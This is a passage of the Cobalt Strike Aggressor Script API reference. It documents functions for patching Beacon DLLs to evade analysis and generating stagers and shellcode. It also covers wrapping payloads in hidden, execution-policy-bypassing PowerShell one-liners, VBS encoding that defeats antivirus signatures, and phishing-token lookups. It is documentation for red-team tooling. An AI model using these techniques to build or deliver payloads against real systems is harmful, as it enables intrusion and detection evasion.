   $replacement = "\x01\x02\x03\xfc\xfe\xff";

   # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
   $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_remove_rich_header

Remove the rich header from Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Example

# -------------------------------------
# Remove/Replace Rich Header
# -------------------------------------
$temp_dll = pe_remove_rich_header($temp_dll);

pe_set_compile_time_with_long

Set the compile time in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Compile Time (as a long in milliseconds)

Returns

Updated DLL Content

Example

# date is in milliseconds ("1893521594000" = "01 Jan 2030 12:13:14")
$date = 1893521594000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);

# date is in milliseconds ("1700000001000" = "14 Nov 2023 16:13:21")
$date = 1700000001000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);

pe_set_compile_time_with_string

Set the compile time in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Compile Time (as a string)

Returns

Updated DLL Content

Example

# ("01 Jan 2020 15:16:17" = "1577913377000")
$strTime = "01 Jan 2020 15:16:17";
$temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime);

pe_set_export_name

Set the export name in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Note

The name must exist in the string table.

Example

# -------------------------------------
# name must be in strings table...
# -------------------------------------
$export_name = "WININET.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);

$export_name = "beacon.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);

pe_set_long

Places a long value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_long {

   local('$temp_dll, $int_offset, $long_value');
   local('%pemap');
   local('@loc_cs, @val_cs');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_cs = values(%pemap, @("CheckSum.<location>"));
   @val_cs = values(%pemap, @("CheckSum.<value>"));

   if (size(@val_cs) != 1) {
      warn("Unexpected size of checksum value array: " . size(@val_cs));
   } else {
      warn("Current checksum value: " . @val_cs[0]);
   }

   if (size(@loc_cs) != 1) {
      warn("Unexpected size of checksum location array: " . size(@loc_cs));
   } else {
      warn("Current checksum location: " . @loc_cs[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $int_offset = parseNumber(@loc_cs[0], 10);
   $long_value = 98765;

   # -------------------------------------
   # pe_set_long (set a long value)
   # -------------------------------------
   # warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
   $temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_set_short

Places a short value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_short {

   local('$temp_dll, $int_offset, $short_value');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @(".text.NumberOfRelocations."));
   @val = values(%pemap, @(".text.NumberOfRelocations."));

   if (size(@val) != 1) {
      warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val));
   } else {
      warn("Current .text.NumberOfRelocations value: " . @val[0]);
   }

   if (size(@loc) != 1) {
      warn("Unexpected size of .text.NumberOfRelocations location array: " . size(@loc));
   } else {
      warn("Current .text.NumberOfRelocations location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $int_offset = parseNumber(@loc[0], 10);
   $short_value = 128;

   # -------------------------------------
   # pe_set_short (set a short value)
   # -------------------------------------
   # warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
   $temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_set_string

Places a string value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_string {

   local('$temp_dll, $location, $value');
   local('%pemap');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_en = values(%pemap, @("Export.Name."));
   @val_en = values(%pemap, @("Export.Name."));

   if (size(@val_en) != 1) {
      warn("Unexpected size of export name value array: " . size(@val_en));
   } else {
      warn("Current export value: " . @val_en[0]);
   }

   if (size(@loc_en) != 1) {
      warn("Unexpected size of export location array: " . size(@loc_en));
   } else {
      warn("Current export name location: " . @loc_en[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $location = parseNumber(@loc_en[0], 10);
   $value = "BEECON.DLL";

   # -------------------------------------
   # pe_set_string (set a string value)
   # -------------------------------------
   # warn("pe_set_string(dll, " . $location . ", " . $value . ")");
   $temp_dll = pe_set_string($temp_dll, $location, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_set_stringz

Places a string value at a specified location and adds a zero terminator.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - String to set

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_stringz {

   local('$temp_dll, $offset, $value');
   local('%pemap');
   local('@loc');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.0."));

   if (size(@loc) != 1) {
      warn("Unexpected size of section name location array: " . size(@loc));
   } else {
      warn("Current section name location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $offset = parseNumber(@loc[0], 10);
   $value = "abc";

   # -------------------------------------
   # pe_set_stringz
   # -------------------------------------
   # warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
   $temp_dll = pe_set_stringz($temp_dll, $offset, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   # $offset = parseNumber(@loc[0], 10);
   # $value = ".tex";

   # -------------------------------------
   # pe_set_string (set a string value)
   # -------------------------------------
   # warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
   # $temp_dll = pe_set_string($temp_dll, $offset, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_set_value_at

Sets a long value based on the location resolved by a name from the PE Map (see pedump).

Arguments

$1 - Beacon DLL content

$2 - Name of location field

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = DLL content
# ===========================================================================
sub demo_pe_set_value_at {

   local('$temp_dll, $name, $long_value, $date');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   # %pemap = pedump($temp_dll);
   # @loc = values(%pemap, @("SizeOfImage."));
   # @val = values(%pemap, @("SizeOfImage."));

   # if (size(@val) != 1) {
   #   warn("Unexpected size of SizeOfImage. value array: " . size(@val));
   # } else {
   #   warn("Current SizeOfImage. value: " . @val[0]);
   # }

   # if (size(@loc) != 1) {
   #   warn("Unexpected size of SizeOfImage location array: " . size(@loc));
   # } else {
   #   warn("Current SizeOfImage. location: " . @loc[0]);
   # }

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $name = "SizeOfImage";
   $long_value = 22334455;

   # -------------------------------------
   # pe_set_value_at (set a long value at the location resolved by name)
   # -------------------------------------
   # $1 = DLL (byte array)
   # $2 = name (string)
   # $3 = value (long)
   # -------------------------------------
   warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")");
   $temp_dll = pe_set_value_at($temp_dll, $name, $long_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # set it back?
   # -------------------------------------
   # warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
   # $temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_stomp

Set a string to null characters. Start at a specified location and sets all characters to null until a null string terminator is reached.

Arguments

$1 - Beacon DLL content

$2 - Start location

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_stomp {

   local('$temp_dll, $offset, $value, $old_name');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.1."));
   @val = values(%pemap, @("Sections.AddressOfName.1."));

   if (size(@val) != 1) {
      warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val));
   } else {
      warn("Current Sections.AddressOfName.1 value: " . @val[0]);
   }

   if (size(@loc) != 1) {
      warn("Unexpected size of Sections.AddressOfName.1 location array: " . size(@loc));
   } else {
      warn("Current Sections.AddressOfName.1 location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $location = parseNumber(@loc[0], 10);

   # -------------------------------------
   # pe_stomp (stomp a string at a location)
   # -------------------------------------
   # warn("pe_stomp(dll, " . $location . ")");
   $temp_dll = pe_stomp($temp_dll, $location);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_update_checksum

Update the checksum in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Note

This should be the last transformation performed.

Example

# -------------------------------------
# update checksum
# -------------------------------------
$temp_dll = pe_update_checksum($temp_dll);

pedump

Parse an executable Beacon into a map of the PE Header information. The parsed information can be used for research or programmatically to make changes to the Beacon.

Arguments

$1 - Beacon DLL content

Returns

A map of the parsed information. The map data is very similar to the "./peclone dump [file]" command output.

Example

# ===========================================================================
# 'case insensitive sort' from sleep manual...
# ===========================================================================
sub caseInsensitiveCompare
{
   $a = lc($1);
   $b = lc($2);
   return $a cmp $b;
}

# ===========================================================================
# Dump PE Information
# $1 = Beacon DLL content
# ===========================================================================
sub dump_my_pe {
   local('$out $key $val %pemap @sorted_keys');

   %pemap = pedump($1);

   # ---------------------------------------------------
   # Example listing all items from hash/map...
   # ---------------------------------------------------
   @sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));
   foreach $key (@sorted_keys)
   {
      $out = "$[50]key";
      foreach $val (values(%pemap, @($key)))
      {
         $out .= " $val";
         println($out);
      }
   }

   # ---------------------------------------------------
   # Example of grabbing specific items from hash/map...
   # ---------------------------------------------------
   local('@loc_cs @val_cs');
   @loc_cs = values(%pemap, @("CheckSum.<location>"));
   @val_cs = values(%pemap, @("CheckSum.<value>"));

   println("");
   println("My DLL CheckSum Location: " . @loc_cs);
   println("My DLL CheckSum Value: " . @val_cs);
   println("");
}
See also

./peclone dump [file]

pgraph

Generate the pivot graph GUI component.

Returns

The pivot graph GUI object (a javax.swing.JComponent)

Example

addVisualization("Pivot Graph", pgraph());
See also

&showVisualization

pivots

Returns a list of SOCKS pivots from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each pivot.

Example

printAll(pivots());

popup_clear

Remove all popup menus associated with the current menu. This is a way to override Cobalt Strike's default popup menu definitions.

Arguments

$1 - the popup hook to clear registered menus for

Example

popup_clear("help");

popup help {
   item "My stuff!" {
      show_message("This is my menu!");
   }
}

powershell

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and &powershell_command instead.

Returns a PowerShell one-liner to bootstrap the specified listener.

Arguments

$1 - the listener name

$2 - [true/false]: is this listener targeting local host?

$3 - x86|x64 - the architecture of the generated stager.

Notes

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A PowerShell one-liner to run the specified listener.

Example

println(powershell("my listener", false));

powershell_command

Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)

Arguments

$1 - the PowerShell expression to wrap into a one-liner.

$2 - will the PowerShell command run on a remote target?

Returns

Returns a powershell.exe one-liner to run the specified expression.

Example

$cmd = powershell_command("2 + 2", false);
println($cmd);

powershell_compress

Compresses a PowerShell script and wraps it in a script to decompress and execute it.

Arguments

$1 - the PowerShell script to compress.

Example

$script = powershell_compress("2 + 2");

powershell_encode_oneliner

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &powershell_command instead.

Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)

Arguments

$1 - the PowerShell expression to wrap into a one-liner.

Returns a powershell.exe one-liner to run the specified expression.

Example

$cmd = powershell_encode_oneliner("2 + 2");
println($cmd);

powershell_encode_stager

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_general and &powershell_command instead.

Returns a base64 encoded PowerShell script to run the specified shellcode

Arguments

$1 - shellcode to wrap

Returns

Returns a base64 encoded PowerShell suitable for use with powershell.exe's -enc option.

Example

$shellcode  = shellcode("my listener", false);
$readytouse = powershell_encode_stager($shellcode);
println("powershell.exe -ep bypass -enc $readytouse");

pref_get

Grabs a string value from Cobalt Strike's preferences.

Arguments

$1 - the preference name

$2 - the default value [if there is no value for this preference]

Returns

A string with the preference value.

Example

$foo = pref_get("foo.string", "bar");

pref_get_list

Grabs a list value from Cobalt Strike's preferences.

Arguments

$1 - the preference name

Returns

An array with the preference values

Example

@foo = pref_get_list("foo.list");

pref_set

Set a value in Cobalt Strike's preferences

Arguments

$1 - the preference name

$2 - the preference value

Example

pref_set("foo.string", "baz!");

pref_set_list

Stores a list value into Cobalt Strike's preferences.

Arguments

$1 - the preference name

$2 - an array of values for this preference

Example

pref_set_list("foo.list", @("a", "b", "c"));

previousTab

Activate the tab that is to the left of the current tab.

Example

bind Ctrl+Left {
   previousTab();
}

process_browser

Opens the Process Browser. This function does not have any parameters.

privmsg

Post a private message to a user in the event log

Arguments

$1 - who to send the message to   

$2 - the message

Example

privmsg("raffi", "what's up man?");

prompt_confirm

Show a dialog with Yes/No buttons. If the user presses yes, call the specified function.

Arguments

$1 - text in the dialog

$2 - title of the dialog

$3 - a callback function. Called when the user presses yes.

Example

prompt_confirm("Do you feel lucky?", "Do you?", {
   show_mesage("Ok, I got nothing");
});

prompt_directory_open

Show a directory open dialog.

Arguments

$1 - title of the dialog

$2 - default value

$3 - true/false: allow user to select multiple folders?

$4 - a callback function. Called when the user chooses a folder. The argument to the callback is the selected folder. If multiple folders are selected, they will still be specified as the first argument, separated by commas.

Example

prompt_directory_open("Choose a folder", $null, false, {
   show_message("You chose: $1");
});

prompt_file_open

Show a file open dialog.

Arguments

$1 - title of the dialog

$2 - default value

$3 - true/false: allow user to select multiple files?

$4 - a callback function. Called when the user chooses a file to open. The argument to the callback is the selected file. If multiple files are selected, they will still be specified as the first argument, separated by commas.

Example

prompt_file_open("Choose a file", $null, false, {
   show_message("You chose: $1");
});

prompt_file_save

Show a file save dialog.

Arguments

$1 - default value

$2 - a callback function. Called when the user chooses a filename. The argument to the callback is the desired file.

Example

prompt_file_save($null, {
   local('$handle');
   $handle = openf("> $+ $1");
   println($handle, "I am content");
   closef($handle);
});

prompt_text

Show a dialog that asks the user for text.

Arguments

$1 - text in the dialog

$2 - default value in the text field.

$3 - a callback function. Called when the user presses OK. The first argument to this callback is the text the user provided.

Example

prompt_text("What is your name?", "Cyber Bob", {
   show_mesage("Hi $1 $+ , nice to meet you!");
});

range

Generate an array of numbers based on a string description of ranges.

Arguments

$1 - a string with a description of ranges

Range Result
103 The number 103
3-8 The numbers 3, 4, 5, 6, and 7.
2,4-6 The numbers 2, 4, and 5.

Returns

An array of numbers within the specified ranges.

Example

printAll(range("2,4-6"));

redactobject

Removes a post-exploitation object (e.g., screenshot, keystroke buffer) from the user interface.

Arguments

$1 - the ID of the post-exploitation object.

removeTab

Close the active tab

Example

bind Ctrl+D {
   removeTab();
}

resetData

Reset Cobalt Strike's data model.

say

Post a public chat message to the event log.

Arguments

$1 - the message

Example

say("Hello World!");

sbrowser

Generate the session browser GUI component. Shows Beacon AND SSH sessions.

Returns

The session browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Session Browser", sbrowser());
See also

&showVisualization

screenshots_funcs

Returns a list of screenshots from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each screenshot.

Example

printAll(screenshots());

script_resource

Returns the full path to a resource that is stored relative to this script file.

Arguments

$1 - the file to get a path for

Returns

The full path to the specified file.

Example

println(script_resource("dummy.txt"));

separator

Insert a separator into the current menu tree.

Example

popup foo {
   item "Stuff" { ... }
   separator();
   item "Other Stuff" { ... }
}

services

Returns a list of services in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each service.

Example

printAll(services());

setup_reflective_loader

Insert the reflective loader executable code into a beacon payload.

Arguments

$1 - Original beacon executable payload.

$2 - User defined Reflective Loader executable data.

Returns

The beacon executable payload updated with the user defined reflective loader. $null if there is an error.

Notes

The user defined Reflective Loader must be less than 5k.

Example

See BEACON_RDLL_GENERATE hook

# ---------------------------------------------------------------------
# Replace the beacons default loader with '$loader'.
# ---------------------------------------------------------------------
$temp_dll = setup_reflective_loader($2, $loader);

setup_strings

Apply the strings defined in the Malleable C2 profile to the beacon payload.

Arguments

$1 – beacon payload to modify

Returns

The updated beacon payload with the defined strings applied to the payload.

Example

See BEACON_RDLL_GENERATE hook

# Apply strings to the beacon payload.
$temp_dll = setup_strings($temp_dll);

setup_transformations

Apply the transformations rules defined in the Malleable C2 profile to the beacon payload.

Arguments

$1 – Beacon payload to modify

$2 – Beacon architecture (x86/x64)

Returns

The updated beacon payload with the transformations applied to the payload.

Example

See BEACON_RDLL_GENERATE hook

# Apply the transformations to the beacon payload.
$temp_dll = setup_transformations($temp_dll, $arch);

shellcode

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead.

Returns raw shellcode for a specific Cobalt Strike listener

Arguments

$1 - the listener name

$2 - true/false: is this shellcode destined for a remote target?

$3 - x86|x64 - the architecture of the stager output.

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing shellcode for the specified listener.

Example

$data = shellcode("my listener", false, "x86");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

showVisualization

Switch Cobalt Strike visualization to a registered visualization.

Arguments

$1 - the name of the visualization

Example

bind Ctrl+H {
   showVisualization("Hello World");
}
See also

&showVisualization

show_error

Shows an error message to the user in a dialog box. Use this function to relay error information.

Arguments

$1 - the message text

Example

show_error("You did something bad.");

show_message

Shows a message to the user in a dialog box. Use this function to relay information.

Arguments

$1 - the message text

Example

show_message("You've won a free ringtone");

site_host

Host content on Cobalt Strike's web server

Arguments

$1 - the host for this site (&localip is a good default)

$2 - the port (e.g., 80)

$3 - the URI (e.g., /foo)

$4 - the content to host (as a string)

$5 - the mime-type (e.g., "text/plain")

$6 - a description of the content. Shown in Site Management -> Manage.

$7 - use SSL or not (true or false)

Returns

The URL to this hosted site

Example

site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World Page", false);

site_kill

Remove a site from Cobalt Strike's web server

Arguments

$1 - the port

$2 - the URI

Example

# removes the content bound to / on port 80
site_kill(80, "/");

sites

Returns a list of sites tied to Cobalt Strike's web server.

Returns

An array of dictionary objects with information about each registered site.

Example

printAll(sites());

ssh_command_describe

Describe an SSH command.

Returns

A string description of the SSH command.

Arguments

$1 - the command

Example

println(beacon_command_describe("sudo"));

ssh_command_detail

Get the help information for an SSH command.

Returns

A string with helpful information about an SSH command.

Arguments

$1 - the command

Example

println(ssh_command_detail("sudo"));

ssh_command_register

Register help information for an SSH console command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

ssh_alis echo {
   blog($1, "You typed: " . substr($1, 5));
}

ssh_command_register(
   "echo", 
   "echo posts to the current session's log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the SSH console");

ssh_commands

Get a list of SSH commands.

Returns

An array of SSH commands.

Example

printAll(ssh_commands());

stager

Returns the stager for a specific Cobalt Strike listener

Arguments

$1 - the listener name

$2 - x86|x64 - the architecture of the stager output.

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing shellcode for the specified listener.

Example

$data = stager("my listener", "x86");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

stager_bind_pipe

Returns a bind_pipe stager for a specific Cobalt Strike listener. This stager is suitable for use in lateral movement actions that benefit from a small named pipe stager. Stage with &beacon_stage_pipe.

Arguments

$1 - the listener name

Returns

A scalar containing x86 bind_pipe shellcode.

Example

# step 1. generate our stager
$stager = stager_bind_pipe("my listener");

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also

&artifact_general

stager_bind_tcp

Returns a bind_tcp stager for a specific Cobalt Strike listener. This stager is suitable for use in localhost-only actions that require a small stager. Stage with &beacon_stage_tcp.

Arguments

$1 - the listener name

$2 - x86|x64 - the architecture of the stager output.

$3 - the port to bind to

Returns

A scalar containing bind_tcp shellcode

Example

# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also

&artifact_general

str_chunk

Chunk a string into multiple parts

Arguments

$1 - the string to chunk

$2 - the maximum size of each chunk

Returns

The original string split into multiple chunks

Example

# hint... :)
else if ($1 eq "template.x86.ps1") {
   local('$enc');
   $enc = str_chunk(base64_encode($2), 61);
   return strrep($data, '%%DATA%%', join("' + '", $enc));
}

str_decode

Convert a string of bytes to text with the specified encoding.

Arguments

$1 - the string to decode

$2 - the encoding to use.

Returns

The decoded text.

Example

# convert back to a string we can use (from UTF16-LE)
$text = str_decode($string, "UTF16-LE");

str_encode

Convert text to byte string with the specified character encoding.

Arguments

$1 - the string to encode

$2 - the encoding to use

Returns

The resulting string.

Example

# convert to UTF16-LE
$encoded = str_encode("this is some text", "UTF16-LE");

str_xor

Walk a string and XOR it with the provided key.

Arguments

$1 - the string to mask

$2 - the key to use (string)

Returns

The original string masked with the specified key.

Example

$mask  = str_xor("This is a string", "key");
$plain = str_xor($mask, "key");

sync_download

Sync a downloaded file (View -> Downloads) to a local path.

Arguments

$1 - the remote path to the file to sync. See &downloads

$2 - where to save the file locally

$3 - [optional] a callback function to execute when download is synced. The first argument to this function is the local path of the downloaded file.

Example

# sync all downloads
command ga {
   local('$download $lpath $name $count');
   foreach $count => $download (downloads()) {
      ($lpath, $name) = values($download, @("lpath", "name"));
   
      sync_download($lpath, script_resource("file $+ .$count"), lambda({ 
         println("Downloaded $1 [ $+ $name $+ ]"); 
      }, \$name));
   }
}

targets

Returns a list of host information in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each host.

Example

printAll(targets());

tbrowser

Generate the target browser GUI component.

Returns

The target browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Target Browser", tbrowser());
See also

&showVisualization

tokenToEmail

Covert a phishing token to an email address.

Arguments

$1 - the phishing token

Returns

The email address or "unknown" if the token is not associated with an email.

Example

set PROFILER_HIT {
   local('$out $app $ver $email');
   $email = tokenToEmail($5);         
   $out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
   foreach $app => $ver ($4) {
      $out .= "\n\t $+ $[25]app $ver";
   }
   return "$out $+ \n\n";
}

transform

Transform shellcode into another format.

Arguments

$1 - the shellcode to transform

$2 - the transform to apply

Type Description
array comma separated byte values
hex Hex-encode the value
powershell-base64 PowerShell.exe-friendly base64 encoder
vba a VBA array() with newlines added in
vbs a VBS expression that results in a string
veil Veil-ready string (\x##\x##)

Returns

The shellcode after the specified transform is applied

Example

println(transform("This is a test!", "veil"));

transform_vbs

Transform shellcode into a VBS expression that results in a string

Arguments

$1 - the shellcode to transform

$2 - the maximum length of a plaintext run

Notes

  • Previously, Cobalt Strike would embed its stagers into VBS files as several Chr() calls concatened into a string.
  • Cobalt Strike 3.9 introduced features that required larger stagers. These larger stagers were too big to embed into a VBS file with the above method.
  • To get past this VBS limitation, Cobalt Strike opted to use Chr() calls for non-ASCII data and runs of double-quoted strings for printable characters.
  • This change, an engineering necessity, unintentionally defeated static anti-virus signatures for Cobalt Strike's default VBS artifacts at that time.
  • If you're looking for an easy evasion benefit with VBS artifacts, consider adjusting the plaintext run length in your Resource Kit.

Returns

The shellcode after this transform is applied

Example

println(transform_vbs("This is a test!", "3"));

tstamp

Format a time into a date/time value. This value does not include seconds.

Arguments

$1 - the time [milliseconds since the UNIX epoch]

Example

println("The time is now: " . tstamp(ticks()));
See also

&dstamp

unbind

Remove a keyboard shortcut binding.

Arguments

$1 - the keyboard shortcut

Example

# restore default behavior of Ctrl+Left and Ctrl+Right
unbind("Ctrl+Left");
unbind("Ctrl+Right");
See also

&bind

url_open

Open a URL in the default browser.

Arguments

$1 - the URL to open

Example

command go {
   url_open("https://www.cobaltstrike.com/");
}

users

Returns a list of users connected to this team server.

Returns

An array of users.

Example

foreach $user (users()) {
   println($user);
}

vpn_interface_info

Get information about a VPN interface.

Arguments

$1 - the interface name

$2 - [Optional] the key to extract a value for

Returns

%info = vpn_interface_info("interface");

Returns a dictionary with the metadata for this interface.

$value = vpn_interface_info("interface", "key");

Returns the value for the specified key from this interface's metadata

Example

# create a script console alias to interface info
command interface {
   println("Interface $1");
   foreach $key => $value (vpn_interface_info($1)) {
      println("$[15]key $value");
   }
}

vpn_interfaces

Return a list of VPN interface names

Returns

An array of interface names.

Example

printAll(vpn_interfaces());

vpn_tap_create

Create a Covert VPN interface on the team server system.

Arguments

$1 - the interface name (e.g., phear0)

$2 - the MAC address ($null will make a random MAC address)

$3 - reserved; use $null for now.

$4 - the port to bind the VPN's channel to

$5 - the type of channel [bind, http, icmp, reverse, udp]

Example

vpn_tap_create("phear0", $null, $null, 7324, "udp");

vpn_tap_delete

Destroy a Covert VPN interface

Arguments

$1 - the interface name (e.g., phear0)

Example

vpn_tap_destroy("phear0");